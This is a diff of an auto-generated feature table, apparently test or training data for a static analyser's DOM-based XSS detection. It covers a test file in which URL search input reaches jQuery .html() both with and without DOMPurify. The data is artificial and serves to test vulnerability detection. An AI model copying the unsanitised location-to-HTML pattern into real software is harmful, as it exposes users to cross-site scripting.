autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:18:13:24 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:18:13:24 | tainted | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14429,6 +104782,103 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:18:13:24 | tainted | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:18:13:24 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:18:13:24 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:7 | inner | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:7 | inner | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:7 | inner | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:7 | inner | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:7 | inner | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | exceptional return of inner(target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | exceptional return of inner(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | exceptional return of inner(target) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | exceptional return of inner(target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | exceptional return of inner(target) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | inner(target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | inner(target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | inner(target) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | inner(target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:3:15:15 | inner(target) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:9:15:14 | target | CalleeFlexibleAccessPath | inner | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:9:15:14 | target | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:9:15:14 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:9:15:14 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:9:15:14 | target | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:9:15:14 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:15:9:15:14 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:16:2 | this | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:16:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:16:2 | this | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:16:2 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:16:2 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | 'arguments' object of function inner | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | 'arguments' object of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | 'arguments' object of function inner | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | 'arguments' object of function inner | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | 'arguments' object of function inner | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | exceptional return of function inner | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | exceptional return of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | exceptional return of function inner | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | exceptional return of function inner | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | exceptional return of function inner | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | functio ... OK\\n } | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | functio ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | functio ... OK\\n } | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | functio ... OK\\n } | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | functio ... OK\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | return of function inner | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | return of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | return of function inner | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | return of function inner | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:3:22:3 | return of function inner | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:12:16:16 | inner | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:16:18:16:18 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:5 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:5 | $ | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:5 | $ | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:5 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | $('myId') | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:18 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:18 | $('myId').html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:18 | $('myId').html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:18 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | $('myId').html(x) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | $('myId').html(x) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | $('myId').html(x) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | $('myId').html(x) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | $('myId').html(x) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | exceptional return of $('myId').html(x) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | exceptional return of $('myId').html(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | exceptional return of $('myId').html(x) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | exceptional return of $('myId').html(x) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:5:17:21 | exceptional return of $('myId').html(x) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:7:17:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:7:17:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:7:17:12 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14436,6 +104886,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:7:17:12 | 'myId' | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:7:17:12 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:7:17:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:15:17:18 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:15:17:18 | html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:15:17:18 | html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:15:17:18 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:15:17:18 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:20:17:20 | x | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:20:17:20 | x | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:20:17:20 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14443,6 +104898,86 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:20:17:20 | x | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:20:17:20 | x | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:17:20:17:20 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:18:9:18:16 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:18:9:18:16 | sanitize | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:18:9:18:16 | sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:18:9:18:16 | sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:18:9:18:16 | sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:7 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:7 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:7 | x | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:7 | x | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:7 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x = DOM ... tize(x) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x = DOM ... tize(x) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x = DOM ... tize(x) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x = DOM ... tize(x) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:7:19:31 | x = DOM ... tize(x) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:19 | DOMPurify | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:19 | DOMPurify | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:19 | DOMPurify | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:19 | DOMPurify | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:19 | DOMPurify | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:28 | DOMPurify.sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:28 | DOMPurify.sanitize | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:28 | DOMPurify.sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:28 | DOMPurify.sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:28 | DOMPurify.sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | DOMPuri ... tize(x) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | DOMPuri ... tize(x) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | DOMPuri ... tize(x) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | DOMPuri ... tize(x) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | DOMPuri ... tize(x) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | exceptional return of DOMPuri ... tize(x) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | exceptional return of DOMPuri ... tize(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | exceptional return of DOMPuri ... tize(x) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | exceptional return of DOMPuri ... tize(x) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:11:19:31 | exceptional return of DOMPuri ... tize(x) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:21:19:28 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:21:19:28 | sanitize | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:21:19:28 | sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:21:19:28 | sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:19:21:19:28 | sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | $ | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | $ | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | x | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | x | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | x | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:5 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:21:5:21:13 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| 